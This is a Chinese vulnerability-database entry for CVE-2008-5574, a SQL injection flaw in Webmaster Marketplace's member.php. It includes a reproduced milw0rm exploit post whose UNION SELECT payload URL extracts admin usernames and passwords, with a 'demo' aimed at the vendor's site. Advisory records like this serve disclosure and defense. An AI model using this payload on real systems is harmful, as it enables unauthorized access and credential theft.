https://www.exploit-db.com/exploits/7407
https://www.securityfocus.com/bid/32756
https://cxsecurity.com/issue/WLB-2008120141
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-259
unscripts UN Webmaster Marketplace 'member.php' SQL注入漏洞






漏洞ID | 1116999 | 漏洞类型 | SQL注入 |
发布时间 | 2008-12-10 | 更新时间 | 2008-12-18 |
![]() |
CVE-2008-5574 | ![]() |
CNNVD-200812-259 |
漏洞平台 | PHP | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
WebmasterMarketplace是一款一站式的电子购特系统。WebmasterMarketplace的member.php中存在SQL注入漏洞。远程攻击者可以借助u参数,执行任意SQL指令。
|漏洞EXP
Webmaster Marketplace (member.php u) Remote SQL Injection Vulnerability
___________________________________
Author: Hussin X
Home :IQ-SecuriTY > www.IQ-TY.com | TrYaG > www.TrYaG.cc
Mail : darkangel_G85@yahoo.com
___________________________________
script : http://www.unscripts.com/MPS.html
DorK : :(
exploit :
_______
http://www.site.com/member.php?u=15+UNION+SELECT+concat(user,0x3e,pass),2+FROM+admin--
Demo :
_______
http://www.unscripts.com/MPS/member.php?u=15+UNION+SELECT+concat(user,0x3e,pass),2+FROM+admin--
login :
http://www.site.com/Admin/login.php
____________________________( Greetz )_________________________________
|
| All members of the Forum| WwW.IQ-ty.CoM | WwW.TrYaG.CC
|
| My friends : str0ke | DeViL iRaQ | IRAQ_JAGUR | Sakab
|
| FAHD | jiko | IRAQ DiveR | Cyber-Zone | CraCkEr | G4N0K
|_____________________________________________________________________
IM IraQi | IM TrYaGi
# milw0rm.com [2008-12-10]
|受影响的产品
unscripts UN Webmaster Marketplace 0
|参考资料
来源:BID
名称:32756
链接:http://www.securityfocus.com/bid/32756
来源:MILW0RM
名称:7407
链接:http://www.milw0rm.com/exploits/7407
来源:SREASON
名称:4747
链接:http://securityreason.com/securityalert/4747
来源:SECUNIA
名称:33096
链接:http://secunia.com/advisories/33096
来源:OSVDB
名称:50655
链接:http://osvdb.org/50655
检索漏洞
开始时间
结束时间